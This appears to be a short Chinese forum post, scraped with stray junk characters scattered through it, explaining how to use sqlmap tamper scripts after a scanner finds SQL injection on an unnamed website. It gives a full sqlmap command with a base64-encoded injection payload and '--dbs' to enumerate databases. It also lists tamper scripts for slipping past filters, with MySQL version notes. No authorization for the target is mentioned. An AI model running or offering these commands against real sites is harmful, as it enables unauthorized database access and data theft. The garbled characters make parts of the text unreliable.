WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?
1 M) h- p0 o# F% V! s# I- N! h* p# A% Z9 L- f( `
sqlmap的tamper里有个base64encode.py% ~: M# x! H4 V- ]& B- g
2 ~6 Z, I* n) T: _
使用如下
& u3 F) [4 }- m4 [! e3 v0 ^+ z4 D D ?9 a, S4 f' y
sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs ]9 k o' q+ I9 r# d
: |# W J' p: `. b X0 c9 d
& f. @+ N# n$ T7 }4 @) Y: M9 d( s
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
( [3 F$ Z# V9 ~1 [& O
8 M" J5 V& P; V/ _2 @) Z其中常用到的bypass脚本绕过SQLMAP主要两个脚本:, b% s# G% w8 c; A5 e5 [& U
( `$ b; D$ V. e- Rspace2hash.py ,对于MYSQL数据库 4.0, 5.0注入9 {% r: }4 `# P( ^1 r+ w' q
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入
; ^8 n4 Q) m4 C( W首先确定目标数据库版本,然后选择相应的脚本。
4 V) Z! t( A$ a: e7 O% ~3 `-v 3 --batch --tamper "space2hash.py"
. ~! |8 c7 o3 v/ M0 q. ^
* w1 Y( s: }8 P还有其他一些插件:2 X/ H" q2 G- X; o" g5 d- g
encodes编码 ——charencode.py
j% w8 k' i2 A5 t1 x0 \base64编码 —— base64encode.py
% x6 q: z* E) w6 M替换空格和关键字 —— halfversionedmorekeywords.py
- }9 E2 ]3 e. O- `7 f | 0 S, m' U" A. @, Y' m0 Z$ O# p- E: s
2 h3 q2 g6 J4 l( u2 @" H/ b
& y$ d0 K6 A( i8 t5 Y [# Q; j) B
) w) q; L0 D7 y( p) c9 F5 R' [ M6 j
|